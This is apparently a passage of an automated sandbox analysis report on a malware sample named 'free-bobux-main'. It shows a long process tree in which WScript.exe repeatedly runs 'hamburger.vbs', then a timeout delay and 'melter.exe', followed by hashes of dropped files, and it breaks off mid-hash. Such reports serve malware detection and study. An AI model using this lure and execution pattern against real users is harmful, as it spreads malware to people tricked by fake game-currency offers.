C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20500
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20556
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20576
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20768
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20924
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21032
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21084
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21168
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21364
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10924
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21520
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21552
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21584
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21692
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21704
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21768
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21840
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21948
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:21992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22040
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22068
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22240
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22312
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11856
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22828
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22916
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:22980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23032
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23388
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23648
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23704
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23788
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24372
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24408
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:23556
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24768
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24796
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24876
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:24968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25108
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25164
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:25216
-
-
-
C:\Windows\system32\timeout.exetimeout /t 20 /nobreak3⤵
- Delays execution with timeout.exe
PID:6900
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exemelter.exe3⤵PID:12680
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x16c 0x5041⤵PID:6048
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3805055 /state1:0x41c64e6d1⤵PID:25372
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:24476
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40B
MD55f8d64193adcec4653f1bde7a101722b
SHA147eccc9de96d1cf57f3b7c0531c228ebe2ddd0b3
SHA256f0d3b7296f77047702e876e58700f4a4564ed9d6f2fd325b6d638b8cad05e31e
SHA5127e008ca5b43158f7d32903c878f9a271ada7de01b4af5526f2f651975369c931e27d156bcf9d28b540f6ae8110f061cb88b84efc883c1897f22df1d4e8b7ed17
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2dd56984-6b33-49da-9209-0401ce1d2e59.tmp
Filesize10KB
MD5bed7bcb85f88205da7e189993617b0dd
SHA1a2025193b2b90c86f94830803fb532751d95317c
SHA256bdf96e0bb1c948bb7038dd6817b0a2f86f1cb9df4bd6fbc48521db5c294040c4
SHA5126bef5b4ab55df2f04b5c812436bbaba780a0c2f3268d08eac2d3aa5560c6aa85ec8bebea74af4e0edd07a40166d37f0eace7f23109fbc069f70b2e6ae5552e6f
-
Filesize
34KB
MD5262bca5a6c0e7c828a9a54a73979ba20
SHA19c8952dcb7d9f95054aa067e912df6ea876c9512
SHA256b3efcabdb296f5536beefb6c7f8af444e291ee87396bb6969966abeaf945cd1f
SHA512e44c6fce5dd33b6b0bf7d72b630e9e76efa415dd09af60b14e3ed7ac0ceb6694e5471bc24e25d10e0249800586d1ac8772680670d0424a09efe3cabe2aa6ee66
-
Filesize
16KB
MD511825cf6da869d7589201092299231bf
SHA1b650151674a230700dc66352a0f002ad5db6d195
SHA2562f315c341e2ff775fceede3d1b5dc2f8124a866a382a2c30b760ac6c2abe7bdd
SHA512e5902c14769efb05fa457dcaf62d4b0d126cf3b71aa9be596e3609e1b63f83d6bc2ab3d1aed9a077a6fbec3e7f6a633b3d0b1a8b77d7d0161af60ed7d260a6b3
-
Filesize
17KB
MD529b8ae1d50ef8543dcebf4e9f53089ef
SHA190297279de99683b3903534459bc9962924d79fa
